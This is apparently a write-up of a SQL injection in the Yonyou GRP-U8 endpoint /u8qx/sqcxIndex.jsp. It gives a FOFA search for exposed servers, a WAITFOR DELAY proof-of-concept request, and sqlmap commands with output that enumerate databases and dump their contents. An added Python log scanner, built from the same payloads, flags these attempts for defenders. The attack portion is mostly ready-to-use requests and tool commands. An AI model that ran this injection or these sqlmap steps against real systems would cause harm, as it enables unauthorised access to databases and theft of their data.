FOFA query:
app="用友-GRP-U8"
Vulnerable endpoint
/u8qx/sqcxIndex.jsp?key=1
POC
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:10'-- HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=5AB71B604B4836522AE5497D7364DA6A
Connection: close
SQL syntax:
WAITFOR DELAY '0:0:6'
Tells SQL Server to pause for 6 seconds before continuing.
- The first number (0) is hours.
- The second number (0) is minutes.
- The third number (6) is seconds.
Testing with SqlMap
sqlmap usage reference: "[SQL Injection Tool] SQLMap Parameters Explained" (CSDN blog)
Enumerating database names
sqlmap.py -u host --batch --dbs
sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: key (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: key=1');WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: key=1') UNION ALL SELECT NULL,CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(72)+CHAR(73)+CHAR(122)+CHAR(101)+CHAR(87)+CHAR(76)+CHAR(119)+CHAR(122)+CHAR(71)+CHAR(70)+CHAR(103)+CHAR(76)+CHAR(117)+CHAR(75)+CHAR(119)+CHAR(103)+CHAR(68)+CHAR(85)+CHAR(107)+CHAR(105)+CHAR(90)+CHAR(84)+CHAR(115)+CHAR(117)+CHAR(116)+CHAR(89)+CHAR(113)+CHAR(108)+CHAR(100)+CHAR(117)+CHAR(122)+CHAR(79)+CHAR(72)+CHAR(84)+CHAR(100)+CHAR(97)+CHAR(86)+CHAR(71)+CHAR(81)+CHAR(81)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(107)+CHAR(113)-- prXP
---
available databases [8]:
[*] anyisys
[*] GZMH
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Dumping data from a specified database [tested with time-based blind injection, which takes a long time]
sqlmap.py -u host -D tempdb --batch --time-sec=10 --dump --output-dir=
--time-sec: set the delay in seconds used for time-based tests
--output-dir=: directory in which to save the results
--batch: answer every prompt with the default (yes)
-D: specify the database
-T: specify the table
-C: specify the column
--dump: dump the data
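Added example, not part of the original write-up: a small Python access-log scanner that flags requests to the endpoint above whose key parameter carries the indicators visible in the POC and in the sqlmap output, namely the `')` breakout, a stacked WAITFOR DELAY, UNION SELECT, and CHAR() string assembly, plus the default sqlmap User-Agent. The log lines, client IP, timestamps and User-Agent strings are constructed; only the endpoint path and parameter name come from this page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Indicators taken from the payloads shown on this page, matched against the URL-decoded key value.
SIGNATURES = [
    ("quote-paren breakout ')", re.compile(r"'\s*\)")),
    ("stacked WAITFOR DELAY", re.compile(r";\s*waitfor\s+delay\s+'", re.I)),
    ("UNION SELECT", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]
CHAR_RUN_MIN = 3  # sqlmap builds its marker string from a long run of CHAR(n)+CHAR(n)+...
# Constructed sample log (hypothetical client 203.0.113.5): line 1 benign, lines 2 and 3 mirror the page's payloads.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2024:10:00:01 +0800] "GET /u8qx/sqcxIndex.jsp?key=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jan/2024:10:00:02 +0800] "GET /u8qx/sqcxIndex.jsp?key=1%27%29%3B+waitfor+delay+%270%3A0%3A10%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jan/2024:10:00:15 +0800] "GET /u8qx/sqcxIndex.jsp?key=1%27%29+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28120%29--+prXP HTTP/1.1" 200 800 "-" "sqlmap/1.x (constructed)"',
]

def parse_line(line):
    # Returns ip, ts, method, target, status, ua, path and decoded params; None if the line is not CLF.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)  # %xx and '+' are decoded here
    return rec

def classify(rec, path="/u8qx/sqcxIndex.jsp", param="key"):
    # Sorted list of indicator labels found in the watched parameter of one parsed request.
    if rec["path"] != path:
        return []
    findings = set()
    for value in rec["params"].get(param, []):
        findings.update(label for label, rx in SIGNATURES if rx.search(value))
        if len(re.findall(r"char\(\d+\)", value, re.I)) >= CHAR_RUN_MIN:
            findings.add("CHAR() string assembly")
    if "sqlmap" in rec["ua"].lower():  # default scanner User-Agent; trivially changed, but cheap to check
        findings.add("sqlmap User-Agent")
    return sorted(findings)

def scan(lines):
    # (ip, timestamp, findings) for every parsable request that trips at least one indicator.
    return [(r["ip"], r["ts"], f) for r in map(parse_line, lines) if r and (f := classify(r))]
```

Run `scan(SAMPLE_LOG)` to see the two injection attempts reported with their indicators; the benign first line produces nothing.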